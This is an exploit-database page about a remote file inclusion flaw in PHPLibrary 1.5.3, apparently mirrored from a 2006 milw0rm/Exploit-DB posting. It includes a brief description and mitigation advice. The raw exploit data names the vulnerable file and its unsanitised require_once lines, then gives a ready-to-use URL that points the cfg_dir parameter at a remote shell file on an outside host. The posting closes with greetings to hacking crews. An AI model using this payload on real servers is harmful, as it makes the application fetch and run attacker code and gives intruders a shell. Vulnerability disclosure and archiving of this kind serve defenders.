PHPLibrary - exploit.company

vendor:

PHPLibrary

by:

k1tk4t

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: PHPLibrary

Affected Version From: 1.5.3

Affected Version To: 1.5.3

Patch Exists: YES

Related CWE: N/A

CPE: PHPLibrary

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PHPLibrary <= 1.5.3 Remote File Inclusion

PHPLibrary version 1.5.3 is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a malicious file which is then included and executed by the vulnerable application.

Mitigation:

The application should be configured to only include files from a limited set of directories. Additionally, input validation should be performed to ensure that the user-supplied data is not malicious.

Source

Exploit-DB raw data:

##################################################################################
# PHPLibrary <= 1.5.3 Remote File Inclusion
# Download Source : http://download.softerra.com/files/PHPLibrary-1.5.3.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   -- #newhack[dot]org
########################################################################
file ;
grid3.lib.php
########################################################################
bugs ;
require_once ($cfg_dir . "database.cfg.php");
require_once ($cfg_dir . "error.codes.php");
require_once ($lib_dir . "sqlstorage.class.php");
require_once ($lib_dir . "registry.lib.php");
########################################################################
exmple and methode exploit ;
http://localhost/PHPLibrary-1.5.3/example/lib/grid3.lib.php?cfg_dir=http://RemoteShell/shell.txt?&
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
person;
y3dips, lirva32, the_day,(&all echo staff)
evilcode,illibero,NoGe(asiahacker),
nyubi,x-ace,ghoz, home_edition2001,matdhule, iFX, and for all
(friend's&enemy)

# milw0rm.com [2006-10-10]